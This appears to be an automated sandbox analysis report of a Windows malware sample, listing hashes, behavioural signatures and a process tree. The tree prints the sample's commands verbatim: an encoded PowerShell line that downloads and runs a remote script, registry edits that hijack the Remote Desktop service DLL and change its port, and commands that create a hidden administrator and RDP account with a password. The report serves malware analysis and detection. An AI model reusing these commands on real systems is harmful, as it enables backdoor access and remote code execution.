Analysis
-
max time kernel
50s -
max time network
118s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-11-2020 21:35
Static task
static1
Behavioral task
behavioral1
Sample
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
Resource
win10v20201028
General
-
Target
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
-
Size
3.5MB
-
MD5
551466c49c45b71ee7b4d5a4fc0a800e
-
SHA1
be312273c1db869c5f23cc9ba24b31b66824a809
-
SHA256
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2
-
SHA512
1f4de516895870a74444b560df538259137900d73b78970926d7bebd0e759976630273e21c8cd6921aec85d614d6d305071cccf5c217762665e5e91d24694e4a
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 16 2544 powershell.exe 18 2544 powershell.exe 19 2544 powershell.exe 20 2544 powershell.exe 22 2544 powershell.exe 24 2544 powershell.exe 26 2544 powershell.exe 28 2544 powershell.exe 30 2544 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 940 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1312 1312 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC8A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC9B.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1zz0yctp.w4n.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC4A.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5lv1s5pl.pte.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC7A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIECCB.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = de4ef1e88fadd601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 940 powershell.exe 940 powershell.exe 940 powershell.exe 940 powershell.exe 940 powershell.exe 940 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 940 powershell.exe Token: SeIncreaseQuotaPrivilege 940 powershell.exe Token: SeSecurityPrivilege 940 powershell.exe Token: SeTakeOwnershipPrivilege 940 powershell.exe Token: SeLoadDriverPrivilege 940 powershell.exe Token: SeSystemProfilePrivilege 940 powershell.exe Token: SeSystemtimePrivilege 940 powershell.exe Token: SeProfSingleProcessPrivilege 940 powershell.exe Token: SeIncBasePriorityPrivilege 940 powershell.exe Token: SeCreatePagefilePrivilege 940 powershell.exe Token: SeBackupPrivilege 940 powershell.exe Token: SeRestorePrivilege 940 powershell.exe Token: SeShutdownPrivilege 940 powershell.exe Token: SeDebugPrivilege 940 powershell.exe Token: SeSystemEnvironmentPrivilege 940 powershell.exe Token: SeRemoteShutdownPrivilege 940 powershell.exe Token: SeUndockPrivilege 940 powershell.exe Token: SeManageVolumePrivilege 940 powershell.exe Token: 33 940 powershell.exe Token: 34 940 powershell.exe Token: 35 940 powershell.exe Token: 36 940 powershell.exe Token: SeIncreaseQuotaPrivilege 940 powershell.exe Token: SeSecurityPrivilege 940 powershell.exe Token: SeTakeOwnershipPrivilege 940 powershell.exe Token: SeLoadDriverPrivilege 940 powershell.exe Token: SeSystemProfilePrivilege 940 powershell.exe Token: SeSystemtimePrivilege 940 powershell.exe Token: SeProfSingleProcessPrivilege 940 powershell.exe Token: SeIncBasePriorityPrivilege 940 powershell.exe Token: SeCreatePagefilePrivilege 940 powershell.exe Token: SeBackupPrivilege 940 powershell.exe Token: SeRestorePrivilege 940 powershell.exe Token: SeShutdownPrivilege 940 powershell.exe Token: SeDebugPrivilege 940 powershell.exe Token: SeSystemEnvironmentPrivilege 940 powershell.exe Token: SeRemoteShutdownPrivilege 940 powershell.exe Token: SeUndockPrivilege 940 powershell.exe Token: SeManageVolumePrivilege 940 powershell.exe Token: 33 940 powershell.exe Token: 34 940 powershell.exe Token: 35 940 powershell.exe Token: 36 940 powershell.exe Token: SeIncreaseQuotaPrivilege 940 powershell.exe Token: SeSecurityPrivilege 940 powershell.exe Token: SeTakeOwnershipPrivilege 940 powershell.exe Token: SeLoadDriverPrivilege 940 powershell.exe Token: SeSystemProfilePrivilege 940 powershell.exe Token: SeSystemtimePrivilege 940 powershell.exe Token: SeProfSingleProcessPrivilege 940 powershell.exe Token: SeIncBasePriorityPrivilege 940 powershell.exe Token: SeCreatePagefilePrivilege 940 powershell.exe Token: SeBackupPrivilege 940 powershell.exe Token: SeRestorePrivilege 940 powershell.exe Token: SeShutdownPrivilege 940 powershell.exe Token: SeDebugPrivilege 940 powershell.exe Token: SeSystemEnvironmentPrivilege 940 powershell.exe Token: SeRemoteShutdownPrivilege 940 powershell.exe Token: SeUndockPrivilege 940 powershell.exe Token: SeManageVolumePrivilege 940 powershell.exe Token: 33 940 powershell.exe Token: 34 940 powershell.exe Token: 35 940 powershell.exe Token: 36 940 powershell.exe -
Suspicious use of WriteProcessMemory 72 IoCs
Processes:
eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1028 wrote to memory of 940 1028 eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe powershell.exe PID 1028 wrote to memory of 940 1028 eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe powershell.exe PID 940 wrote to memory of 3656 940 powershell.exe csc.exe PID 940 wrote to memory of 3656 940 powershell.exe csc.exe PID 3656 wrote to memory of 2224 3656 csc.exe cvtres.exe PID 3656 wrote to memory of 2224 3656 csc.exe cvtres.exe PID 940 wrote to memory of 2556 940 powershell.exe reg.exe PID 940 wrote to memory of 2556 940 powershell.exe reg.exe PID 940 wrote to memory of 184 940 powershell.exe reg.exe PID 940 wrote to memory of 184 940 powershell.exe reg.exe PID 940 wrote to memory of 208 940 powershell.exe reg.exe PID 940 wrote to memory of 208 940 powershell.exe reg.exe PID 940 wrote to memory of 428 940 powershell.exe net.exe PID 940 wrote to memory of 428 940 powershell.exe net.exe PID 428 wrote to memory of 2524 428 net.exe net1.exe PID 428 wrote to memory of 2524 428 net.exe net1.exe PID 940 wrote to memory of 2064 940 powershell.exe cmd.exe PID 940 wrote to memory of 2064 940 powershell.exe cmd.exe PID 2064 wrote to memory of 3300 2064 cmd.exe cmd.exe PID 2064 wrote to memory of 3300 2064 cmd.exe cmd.exe PID 3300 wrote to memory of 2380 3300 cmd.exe net.exe PID 3300 wrote to memory of 2380 3300 cmd.exe net.exe PID 2380 wrote to memory of 4020 2380 net.exe net1.exe PID 2380 wrote to memory of 4020 2380 net.exe net1.exe PID 940 wrote to memory of 3976 940 powershell.exe cmd.exe PID 940 wrote to memory of 3976 940 powershell.exe cmd.exe PID 3976 wrote to memory of 3176 3976 cmd.exe cmd.exe PID 3976 wrote to memory of 3176 3976 cmd.exe cmd.exe PID 3176 wrote to memory of 3156 3176 cmd.exe net.exe PID 3176 wrote to memory of 3156 3176 cmd.exe net.exe PID 3156 wrote to memory of 2360 3156 net.exe net1.exe PID 3156 wrote to memory of 2360 3156 net.exe net1.exe PID 2544 wrote to memory of 2180 2544 cmd.exe net.exe PID 2544 wrote to memory of 2180 2544 cmd.exe net.exe PID 2180 wrote to memory of 3904 2180 net.exe net1.exe PID 2180 wrote to memory of 3904 2180 net.exe net1.exe PID 3980 wrote to memory of 3424 3980 cmd.exe net.exe PID 3980 wrote to memory of 3424 3980 cmd.exe net.exe PID 3424 wrote to memory of 200 3424 net.exe net1.exe PID 3424 wrote to memory of 200 3424 net.exe net1.exe PID 2600 wrote to memory of 2524 2600 cmd.exe net.exe PID 2600 wrote to memory of 2524 2600 cmd.exe net.exe PID 2524 wrote to memory of 2460 2524 net.exe net1.exe PID 2524 wrote to memory of 2460 2524 net.exe net1.exe PID 3964 wrote to memory of 2420 3964 cmd.exe net.exe PID 3964 wrote to memory of 2420 3964 cmd.exe net.exe PID 2420 wrote to memory of 752 2420 net.exe net1.exe PID 2420 wrote to memory of 752 2420 net.exe net1.exe PID 2508 wrote to memory of 3084 2508 cmd.exe net.exe PID 2508 wrote to memory of 3084 2508 cmd.exe net.exe PID 3084 wrote to memory of 2544 3084 net.exe net1.exe PID 3084 wrote to memory of 2544 3084 net.exe net1.exe PID 3956 wrote to memory of 2856 3956 cmd.exe net.exe PID 3956 wrote to memory of 2856 3956 cmd.exe net.exe PID 2856 wrote to memory of 3980 2856 net.exe net1.exe PID 2856 wrote to memory of 3980 2856 net.exe net1.exe PID 3996 wrote to memory of 3588 3996 cmd.exe WMIC.exe PID 3996 wrote to memory of 3588 3996 cmd.exe WMIC.exe PID 2960 wrote to memory of 2380 2960 cmd.exe WMIC.exe PID 2960 wrote to memory of 2380 2960 cmd.exe WMIC.exe PID 1580 wrote to memory of 3988 1580 cmd.exe cmd.exe PID 1580 wrote to memory of 3988 1580 cmd.exe cmd.exe PID 3988 wrote to memory of 2544 3988 cmd.exe powershell.exe PID 3988 wrote to memory of 2544 3988 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe"C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8022.tmp" "c:\Users\Admin\AppData\Local\Temp\xmkjgs20\CSC3C8662C2998F402F926B99A1C49107C.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc xvYay6Ls /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc xvYay6Ls /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc xvYay6Ls /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc xvYay6Ls1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc xvYay6Ls2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc xvYay6Ls3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
